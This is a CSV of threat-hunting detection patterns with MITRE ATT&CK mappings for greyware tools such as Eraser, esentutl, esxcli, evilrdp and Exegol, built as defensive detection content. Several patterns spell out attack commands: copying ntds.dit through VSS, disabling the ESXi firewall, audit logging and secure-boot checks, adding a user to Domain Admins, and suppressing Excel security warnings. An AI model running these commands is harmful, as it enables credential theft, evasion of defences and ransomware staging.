"*\Windows\Start Menu\Programs\Eraser\Eraser Verify.lnk*",".{0,1000}\\Windows\\Start\sMenu\\Programs\\Eraser\\Eraser\sVerify\.lnk.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Windows\Start Menu\Programs\Eraser\Eraser Website.url*",".{0,1000}\\Windows\\Start\sMenu\\Programs\\Eraser\\Eraser\sWebsite\.url.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*>Eraser - Secure Information Removal Tool<*",".{0,1000}\>Eraser\s\-\sSecure\sInformation\sRemoval\sTool\<.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#description","N/A","7","10","N/A","N/A","N/A","N/A"
"*>Eraser Setup Bootstrapper<*",".{0,1000}\>Eraser\sSetup\sBootstrapper\<.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#description","N/A","7","10","N/A","N/A","N/A","N/A"
"*47e484261a88ba1a895699d8ff0239e1f5089b4a96128e8e610e2b41a9bd4605*",".{0,1000}47e484261a88ba1a895699d8ff0239e1f5089b4a96128e8e610e2b41a9bd4605.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*491301f6b3bc5074f978eb8ad5629923be5e5a750f43d7df96fc9c48612a0016*",".{0,1000}491301f6b3bc5074f978eb8ad5629923be5e5a750f43d7df96fc9c48612a0016.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*4ce2ba1b4eabaf58b763ac456397b43ece17e9803e806bf405b28c386a484f6a*",".{0,1000}4ce2ba1b4eabaf58b763ac456397b43ece17e9803e806bf405b28c386a484f6a.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*9d3a9deeeac5f53514e20f1a6dacd125ddec7e17e18d27c23a276ed5eb608878*",".{0,1000}9d3a9deeeac5f53514e20f1a6dacd125ddec7e17e18d27c23a276ed5eb608878.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*a03578a6b28aff267f20a87755696a91a1d5b923e815b2989e4afcc8915cc357*",".{0,1000}a03578a6b28aff267f20a87755696a91a1d5b923e815b2989e4afcc8915cc357.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*a09787812790b59ec3d36120788ae9f80b7bdda1e2d7a17a46d8112324632737",".{0,1000}a09787812790b59ec3d36120788ae9f80b7bdda1e2d7a17a46d8112324632737","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*bbc22b7149e74ee2ca344ebc55207e6bae4837b77857c7e9ef9e16682d7c8c49*",".{0,1000}bbc22b7149e74ee2ca344ebc55207e6bae4837b77857c7e9ef9e16682d7c8c49.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*ee4026fe96e047558bedd20cf870d1f8348beb91a2c88fbf4cedd6357e316f1d*",".{0,1000}ee4026fe96e047558bedd20cf870d1f8348beb91a2c88fbf4cedd6357e316f1d.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*Eraser.exe addtask *",".{0,1000}Eraser\.exe\saddtask\s.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*PortableApps.com/EraserPortable*",".{0,1000}PortableApps\.com\/EraserPortable.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*sourceforge.net/projects/eraser/files/Eraser*/download*",".{0,1000}sourceforge\.net\/projects\/eraser\/files\/Eraser.{0,1000}\/download.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*esentutl.exe /y /vss *:\windows\ntds\ntds.dit*",".{0,1000}esentutl\.exe\s\/y\s\/vss\s.{0,1000}\:\\windows\\ntds\\ntds\.dit.{0,1000}","greyware_tool_keyword","esentutl","extract the AD Database","T1005 - T1006 - 	T1564.004 - T1105 - T1570 - T1003.003","TA0006 - TA0005 - TA0003 - TA0010","N/A","Chimera - menuPass","Credential Access","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*esxcli network firewall set -enabled f*",".{0,1000}esxcli\snetwork\sfirewall\sset\s\-enabled\sf.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1562.004 - T1070.003","TA0005 ","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli system account add*",".{0,1000}esxcli\ssystem\saccount\sadd.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1098 - T1078 - T1078.003","TA0003 - TA0004","N/A","N/A","Persistence","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli system account remove*",".{0,1000}esxcli\ssystem\saccount\sremove.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli system account set -i * -s t*",".{0,1000}esxcli\ssystem\saccount\sset\s\-i\s.{0,1000}\s\-s\st.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1098 - T1078 - T1078.003","TA0003 - TA0004","N/A","N/A","Persistence","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli system auditrecords local disable*",".{0,1000}esxcli\ssystem\sauditrecords\slocal\sdisable.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1542.003 - T1562.001 - T1553.002 - T1542 - T1600","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli system permission list*",".{0,1000}esxcli\ssystem\spermission\slist.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1069.002 ","TA0007","N/A","N/A","Discovery","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli system settings encryption set - require-exec-installed-only=F*",".{0,1000}esxcli\ssystem\ssettings\sencryption\sset\s\-\srequire\-exec\-installed\-only\=F.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1542.003 - T1562.001 - T1553.002 - T1542 - T1600","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli system settings encryption set - require-secure-boot=F*",".{0,1000}esxcli\ssystem\ssettings\sencryption\sset\s\-\srequire\-secure\-boot\=F.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1542.003 - T1562.001 - T1553.002 - T1542 - T1600","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli system settings kernel set -s execInstalledOnly -v F*",".{0,1000}esxcli\ssystem\ssettings\skernel\sset\s\-s\sexecInstalledOnly\s\-v\sF.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1542.003 - T1562.001 - T1553.002 - T1542 - T1600","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli vm process kill *",".{0,1000}esxcli\svm\sprocess\skill\s.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli vm process list*",".{0,1000}esxcli\svm\sprocess\slist.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1057 - T1082","TA0007","N/A","N/A","Discovery","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*dorgreen1@gmail.com*",".{0,1000}dorgreen1\@gmail\.com.{0,1000}","greyware_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","#email","N/A","10","10","281","31","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z"
"*info@skelsecprojects.com*",".{0,1000}info\@skelsecprojects\.com.{0,1000}","greyware_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","#email","N/A","10","10","281","31","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z"
"*reg add HKCU\software\policies\microsoft\office\16.0\excel\security /v PythonFunctionWarnings /t REG_DWORD /d 0 /f?*",".{0,1000}reg\sadd\sHKCU\\software\\policies\\microsoft\\office\\16\.0\\excel\\security\s\/v\sPythonFunctionWarnings\s\/t\sREG_DWORD\s\/d\s0\s\/f\?.{0,1000}","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","N/A","7","2","113","14","2024-08-16T18:57:21Z","2022-01-11T07:34:37Z"
"*Set-ItemProperty *\excel\security*pythonfunctionwarnings*0*",".{0,1000}Set\-ItemProperty\s.{0,1000}\\excel\\security.{0,1000}pythonfunctionwarnings.{0,1000}0.{0,1000}","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","N/A","7","2","113","14","2024-08-16T18:57:21Z","2022-01-11T07:34:37Z"
"* -f *.dmp windows.cmdline*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.cmdline.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.dlllist --pid *",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.dlllist\s\-\-pid\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.filescan*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.filescan.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.handles --pid *",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.handles\s\-\-pid\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.info*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.info.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.malfind*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.malfind.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.netscan*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.netscan.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.netstat*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.netstat.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.pslist*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.pslist.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.psscan*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.psscan.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.pstree*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.pstree.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.registry.hivelist*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.registry\.hivelist.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.registry.hivescan*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.registry\.hivescan.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.registry.printkey*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.registry\.printkey.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* -f *.dmp windows.registry.printkey*Software\Microsoft\Windows\CurrentVersion*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.registry\.printkey.{0,1000}Software\\Microsoft\\Windows\\CurrentVersion.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"* http-put-server.py*",".{0,1000}\shttp\-put\-server\.py.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*/http-put-server.py*",".{0,1000}\/http\-put\-server\.py.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*dig axfr * @*",".{0,1000}dig\saxfr\s.{0,1000}\s\@.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*ftp-server -u * -P * -p 2121*",".{0,1000}ftp\-server\s\-u\s.{0,1000}\s\-P\s.{0,1000}\s\-p\s2121.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*nbtscan -r */24*",".{0,1000}nbtscan\s\-r\s.{0,1000}\/24.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*net rpc group addmem 'Domain admins' *",".{0,1000}net\srpc\sgroup\saddmem\s\'Domain\sadmins\'\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*net rpc group members 'Domain admins' -U *",".{0,1000}net\srpc\sgroup\smembers\s\'Domain\sadmins\'\s\-U\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*netdiscover -i * -r */24*",".{0,1000}netdiscover\s\-i\s.{0,1000}\s\-r\s.{0,1000}\/24.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken*",".{0,1000}ngrok\sauthtoken\sAUTHTOKEN\:\:\:https\:\/\/dashboard\.ngrok\.com\/get\-started\/your\-authtoken.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*nmap -Pn -v -sS -F*",".{0,1000}nmap\s\-Pn\s\-v\s\-sS\s\-F.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*pwnedornot.py -d *",".{0,1000}pwnedornot\.py\s\-d\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*scout aws --profile default -f*",".{0,1000}scout\saws\s\-\-profile\sdefault\s\-f.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*scout azure --cli*",".{0,1000}scout\sazure\s\-\-cli.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
